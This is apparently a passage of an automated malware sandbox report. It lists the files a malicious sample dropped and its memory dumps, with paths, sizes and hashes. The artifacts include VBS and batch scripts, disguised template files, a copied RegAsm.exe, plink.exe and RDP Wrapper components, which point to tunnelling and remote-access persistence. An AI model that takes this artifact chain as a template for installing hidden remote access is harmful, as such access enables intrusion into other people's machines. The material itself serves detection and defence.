  SHA256: 563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14
  SHA512: 79b4f306f9d89af12441fb6df2221a0ff8b9124ff23fadca037ed2319eb6a989bc94595598c49b61ed2e8dc12015b68190e59b7658eeaf1825d8d37de2586865

• C:\Users\Admin\AppData\Roaming\UFsvtvN\25.vbs
  Filesize: 2KB
  MD5: 193242114c1738d0ea04aa93659fdd5a
  SHA1: a929cc1cfbe44ba8a99117dfd7819776ab45d465
  SHA256: c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928
  SHA512: 46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

• C:\Users\Admin\AppData\Roaming\UFsvtvN\329.vbs
  Filesize: 2KB
  MD5: d427d2ed9db86d08b38f5f8b5eec4493
  SHA1: 5cfe9f751bad99009abf1a642eec8f7c67870051
  SHA256: 7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512
  SHA512: fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659

• C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs
  Filesize: 2KB
  MD5: 0884b6e1aaf279208fe5f97cbfa85276
  SHA1: 388f310a0d62a3362db22659e93cb6cb517c21b8
  SHA256: 490c84854174fa43f15d9ca2967578ed5aa614f5327ccccb5cb6ba589db3aeb6
  SHA512: 68d515e3660306e7e6c7a5661b41232e6a19788ef05d614962f64873056dcc8a5489c4d1ac22ad2e3f632d6c4e7497a40d0511527f0ac1a8e0dff7366731eead

• C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs
  Filesize: 3KB
  MD5: 4b48e917e7d8cb65b43fac439a3e9e16
  SHA1: 72da241d20a8ea319363a52ec9c2f3eb82e57fb1
  SHA256: 475ad057cf0aeb679a0802391f3b799d8673d95a410efa5b9df933896ec6eeef
  SHA512: 6145cb081886993d27cdc15ce2076ca2221c52d27bd1a54e390cbc303c74a56d47e9785ffa8fc4989cb864a3ac2777d98d469ab7e0ca0072ac57f837777bd5e8

• C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat
  Filesize: 1KB
  MD5: 846d680e864cd2606699e8ec9ac741d9
  SHA1: 73461395a60999c0192b3354b3ddb0598117d8ac
  SHA256: b2ac4a063cc12f49ef2847c3cca31b001460c4af3b2da90d6507e5bb92edda00
  SHA512: 3bd3b8bca35573b68a427b66fc95a509f7e5d7aab81e350865a8fd3862d765247c64387b97a804b418c7a170733f62c46f61314bff74a71bb0b4999ceb55fed4

• C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll
  Filesize: 1KB
  MD5: a1137415da39d87b2fcafab749ea19c2
  SHA1: 8dcd904266debebc3e40ac08d9d587fc0b485315
  SHA256: 1867737e9a64ff883768e7861241f391d2ef01b9f82a0e8abd041757056d59db
  SHA512: e61b3a2b621ad9b6fb0c3053319f5f01be6b124e30789ebbb432bbc54767dd6544cd745bcd402a5fc082b6f0c080c6b6ccc53741b0d533418a6d4a6328dfd196

• C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll
  Filesize: 837B
  MD5: f5e004628f307168321434b6a91a529b
  SHA1: 00d001de6795a30c3d4c29f30eb261aa7435e53f
  SHA256: c520dd6dca0ef5cbdadd13a1162b4503dd97b8cf99558947bc01e6009129bafe
  SHA512: eea7c3a476801809a02b0a000265e2d424f8b7f8dae09138730636f47137fbc1db65234134279a3c4ce5947743869f9044e57212c0f5803ac9871972177fc18d

• C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll
  Filesize: 942B
  MD5: 3586aae409d659bdc98e2457091469ca
  SHA1: 8b585648fbd020efeb27189024215f3876ecfe74
  SHA256: 6f9d4c2ba2464458b20cf64ccef24ad84e558e9b78280c156640ca5624b3b65c
  SHA512: d1c8705d988f6e7a196e5e37121a8de0e77d3219b6b955f9e87c9ed9a49cda63058cbc3d218d506e3db18a8453f9135c377d0db767364865eca395f55c0c100b

• C:\Users\Admin\AppData\Roaming\UFsvtvN\pNvTxatFeC.bat
  Filesize: 1KB
  MD5: 6d19b2702b77a20b89818484cbc83506
  SHA1: f42dbd3ab3c60ea9952e2a0f66826e153f89d943
  SHA256: 042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f
  SHA512: 184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Abbassando.xltx
  Filesize: 1.0MB
  MD5: e8b84f9aae8f56157bab0cb0ca34fe45
  SHA1: 08f3fae0a026c59d42d698eeceb2cde4cb5cc83e
  SHA256: 276c2faaae669568b7655862d1aa85c7b711df06a4bea1cce5f6f5578d9d440e
  SHA512: 03d80a1a53daa470f6a684f84609b3f744e524300fb6f7e693f0d102bd77ac1d140da200cb4b3df86e0477826bbd7eaba10a8e10d68b6ce378b55384cb18430a

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Attesa.xltx
  Filesize: 1.1MB
  MD5: 1cbc6a4ec6699390f807eaca769b9e9e
  SHA1: 265b0640a35ce9a161ec4c0cad5142d5cf7e9feb
  SHA256: 747cfe4985ce5203e973f9be6ac7e43c6980babcb7203f1c989469670feec350
  SHA512: 19fcba9aa6fa052c7ef032f694313b153835a78bbc7072b54f41f3ef9c8985a70b67c7de968312793c2a644d55411f0a058aab955945322069191b746ca44b47

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Esistenza.xltx
  Filesize: 1.0MB
  MD5: 6c1b9b74d09b572db467629a0e4d3eec
  SHA1: a38508ddc0d932690f416532ddbd32ee4375b164
  SHA256: 70b96681d633c392bd6b2782128ee018bbe2eedb1ab565784db6016f1401f609
  SHA512: 3515105e577255827e26b28bbcd79219bf5598809d526481b34dcb645bb54827d7680b2ee9cb82036cfefbc636211b66f73efc63a9a99e09cbb45ffbf5230b5c

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Facilita.xltx
  Filesize: 1.9MB
  MD5: f07ba54d61e8ecd234cfc29dbd63c082
  SHA1: 2959ab5302060059db4c12af0ff9aa5c8d060499
  SHA256: 17b8e05da75af68ae79999fb70d3031cbfc92ffaa6862e8b6bb6f9cee11a100a
  SHA512: b4ab41d0c0d26b79418a96a926217540e6c784fa87f6625416c39280245773ddf3c84c671fc5e1a9a79a628b12b79c09f34e4ca50fdded172b1add790c3f5864

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Mio.xltx
  Filesize: 921KB
  MD5: a2a838e2b4d650fc8f8f59408183684a
  SHA1: 90c5b4ed3cb75b7ce6d3fb201d53bcb83fc812a1
  SHA256: ad7dc09b1a02ac60bc7fca76a294dfa5499af0ba7a840ff845c042cbac875e57
  SHA512: 226dd3f5697759bed3926483966b0e71287526dd2308a460239e6cc215dce20a4bb06505969c30efbea5000c135bc2c3eb5b6b1bdb6a17b6cb748e9783336027

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
  Filesize: 921KB
  MD5: 78ba0653a340bac5ff152b21a83626cc
  SHA1: b12da9cb5d024555405040e65ad89d16ae749502
  SHA256: 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
  SHA512: efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
  Filesize: 63KB
  MD5: 0d5df43af2916f47d00c1573797c1a13
  SHA1: 230ab5559e806574d26b4c20847c368ed55483b0
  SHA256: c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
  SHA512: f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Rimasta.xltx
  Filesize: 138KB
  MD5: 6dfb1c72ba137b2aa256907636a86427
  SHA1: df8349a7e235ab63920ede1ba662628e2ec3b9e1
  SHA256: bd439ef1861dbad75461d95f2ced0e3a6ae9fd776b51fab9f5717444fd89d3ab
  SHA512: 7298f2db3485a48de49645e7deeb1f413e16d3f4f01c96ddc1599be65465d66918c36b7f95db167b67bc03b2b60564dc9437da6aa798ac2a9842d88bfe4b01db

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Solitario.xltx
  Filesize: 389KB
  MD5: d3394e00792e6cddadf23ad7e89629f6
  SHA1: e36e73c357ff01cb184fa477c0f2957a21bbac00
  SHA256: 71d98c2ccab23a0bf3701d9e3758d40b152309f96d97d83388663f2985a67e04
  SHA512: ebd7107dddfa14eb73d3f36e124dd253ad4a7fe11a2b425205ad08a236061e614536622924a5b28bdf5212c10202d0b8b6f4d0040e9a6fba3391d0a1f244707b

• C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Viso.xltx
  Filesize: 88KB
  MD5: 8fb8bc2a52e6514fcd7c481e3d2c5a19
  SHA1: b214c89d3960f7c67fe76a55839e6da7342c6b20
  SHA256: f7dc64367911ef5e81f3bfb586bb0ffa24e2d2fb19f845b2c1fba6c84ca6006e
  SHA512: 4cc02e9a48decb29c927bc2bcc800576370db96573757e1164e6133641641d5edd10f7be01cf7cf7ee6840cfe445e9ab6debfdea60b623950abb2f8a1373fb37

• C:\Users\Admin\AppData\Roaming\plink.exe
  Filesize: 589KB
  MD5: a69a5f42dcb18bf37e800bf86b313b36
  SHA1: 3f2e4937339e8153898c2a354c443f4512f3f516
  SHA256: cba9b840fccc043ca78994dfb7a55046f0fa865690ed9f8f227ab8b3615dd843
  SHA512: 9560ecda06216120afdf42ce838924c03b866312afea27c56c66865fcac591cc0d0e204bf9a074612e4174832c10b2afa8abef304d7a5f73f1e41ff3eb691dd9

• \??\c:\program files\rdp wrapper\rdpwrap.dll
  Filesize: 114KB
  MD5: 461ade40b800ae80a40985594e1ac236
  SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
  SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

• \??\c:\program files\rdp wrapper\rdpwrap.ini
  Filesize: 128KB
  MD5: dddd741ab677bdac8dcd4fa0dda05da2
  SHA1: 69d328c70046029a1866fd440c3e4a63563200f9
  SHA256: 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668
  SHA512: 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

• \??\c:\program files\rdp wrapper\rdpwrap.ini
  Filesize: 188KB
  MD5: 234237e237aecf593574caf95b1432a2
  SHA1: 9b925bd5b9d403e90924f613d1d16ecf12066b69
  SHA256: d9bb5a5359b3ff1865722b6fbf089f0165c5ce95d1ed9aea624ba57866781ceb
  SHA512: b0cc341b68692899887a5750d937a8693f1063187f6341b7ac23512216f38381853309fd01440bd869d8816d5fded56486578f0e1169124ffe06ac92ad6723a0

• memory/656-356-0x0000000000400000-0x000000000056F000-memory.dmp
  Filesize: 1.4MB

• memory/848-67-0x0000000000580000-0x00000000005E6000-memory.dmp
  Filesize: 408KB

• memory/848-66-0x0000000000580000-0x00000000005E6000-memory.dmp
  Filesize: 408KB

• memory/848-63-0x0000000000580000-0x00000000005E6000-memory.dmp
  Filesize: 408KB

• memory/848-76-0x0000000000580000-0x00000000005E6000-memory.dmp
  Filesize: 408KB

• memory/1716-184-0x0000000005FC0000-0x0000000006314000-memory.dmp
  Filesize: 3.3MB

• memory/1716-186-0x000000006F3D0000-0x000000006F41C000-memory.dmp
  Filesize: 304KB

• memory/2008-101-0x000000006F3D0000-0x000000006F41C000-memory.dmp
  Filesize: 304KB

• memory/2008-117-0x0000000007120000-0x0000000007131000-memory.dmp
  Filesize: 68KB

• memory/2008-114-0x0000000006F10000-0x0000000006F2A000-memory.dmp
  Filesize: 104KB

• memory/2008-113-0x0000000007550000-0x0000000007BCA000-memory.dmp
  Filesize: 6.5MB

• memory/2008-112-0x0000000006DB0000-0x0000000006E53000-memory.dmp
  Filesize: 652KB

• memory/2008-111-0x00000000061A0000-0x00000000061BE000-memory.dmp
  Filesize: 120KB

• memory/2008-100-0x00000000061C0000-0x00000000061F2000-memory.dmp
  Filesize: 200KB

• memory/2008-121-0x0000000007220000-0x0000000007228000-memory.dmp
  Filesize: 32KB

• memory/2008-99-0x0000000005BD0000-0x0000000005BEE000-memory.dmp
  Filesize: 120KB

• memory/2008-116-0x0000000007180000-0x0000000007216000-memory.dmp
  Filesize: 600KB

• memory/2008-98-0x0000000005710000-0x0000000005A64000-memory.dmp
  Filesize: 3.3MB

• memory/2008-115-0x0000000006F80000-0x0000000006F8A000-memory.dmp
  Filesize: 40KB

• memory/2008-88-0x0000000005650000-0x00000000056B6000-memory.dmp
  Filesize: 408KB

• memory/2008-87-0x00000000055E0000-0x0000000005646000-memory.dmp
  Filesize: 408KB

• memory/2008-86-0x0000000005540000-0x0000000005562000-memory.dmp
  Filesize: 136KB

• memory/2008-85-0x0000000004EA0000-0x00000000054C8000-memory.dmp
  Filesize: 6.2MB

• memory/2008-84-0x0000000004730000-0x0000000004766000-memory.dmp
  Filesize: 216KB

• memory/2008-118-0x0000000007140000-0x000000000714E000-memory.dmp
  Filesize: 56KB

                                                          • memory/2008-119-0x0000000007150000-0x0000000007164000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/2008-120-0x0000000007240000-0x000000000725A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/2036-252-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/2096-146-0x00000000078F0000-0x0000000007993000-memory.dmp

                                                            Filesize

                                                            652KB

                                                          • memory/2096-136-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/2096-147-0x0000000007C40000-0x0000000007C51000-memory.dmp

                                                            Filesize

                                                            68KB

                                                          • memory/2096-148-0x0000000007C90000-0x0000000007CA4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/2096-134-0x0000000006260000-0x00000000065B4000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/2608-354-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/2748-411-0x0000018A774B0000-0x0000018A774D2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/3088-294-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/3088-304-0x00000000078D0000-0x00000000078E1000-memory.dmp

                                                            Filesize

                                                            68KB

                                                          • memory/3088-305-0x0000000007910000-0x0000000007924000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/3476-342-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/3556-366-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/4336-83-0x0000000000B00000-0x0000000000CEC000-memory.dmp

                                                            Filesize

                                                            1.9MB

                                                          • memory/4336-81-0x0000000000B00000-0x0000000000CEC000-memory.dmp

                                                            Filesize

                                                            1.9MB

                                                          • memory/4336-78-0x0000000000B00000-0x0000000000CEC000-memory.dmp

                                                            Filesize

                                                            1.9MB

                                                          • memory/4556-62-0x0000000005BF0000-0x0000000005CFA000-memory.dmp

                                                            Filesize

                                                            1.0MB

                                                          • memory/4556-58-0x0000000005DD0000-0x00000000063E8000-memory.dmp

                                                            Filesize

                                                            6.1MB

                                                          • memory/4556-55-0x00000000013A0000-0x00000000013BC000-memory.dmp

                                                            Filesize

                                                            112KB

                                                          • memory/4556-61-0x0000000005910000-0x000000000595C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/4556-60-0x00000000058D0000-0x000000000590C000-memory.dmp

                                                            Filesize

                                                            240KB

                                                          • memory/4556-59-0x0000000005870000-0x0000000005882000-memory.dmp

                                                            Filesize

                                                            72KB

                                                          • memory/4744-161-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/4744-171-0x0000000007710000-0x00000000077B3000-memory.dmp

                                                            Filesize

                                                            652KB

                                                          • memory/4744-155-0x0000000005F00000-0x0000000006254000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/4744-172-0x00000000079E0000-0x00000000079F1000-memory.dmp

                                                            Filesize

                                                            68KB

                                                          • memory/4744-173-0x0000000007A20000-0x0000000007A34000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/4848-317-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/4868-373-0x0000000000400000-0x000000000056F000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/4948-273-0x000000006F3D0000-0x000000006F41C000-memory.dmp

                                                            Filesize

                                                            304KB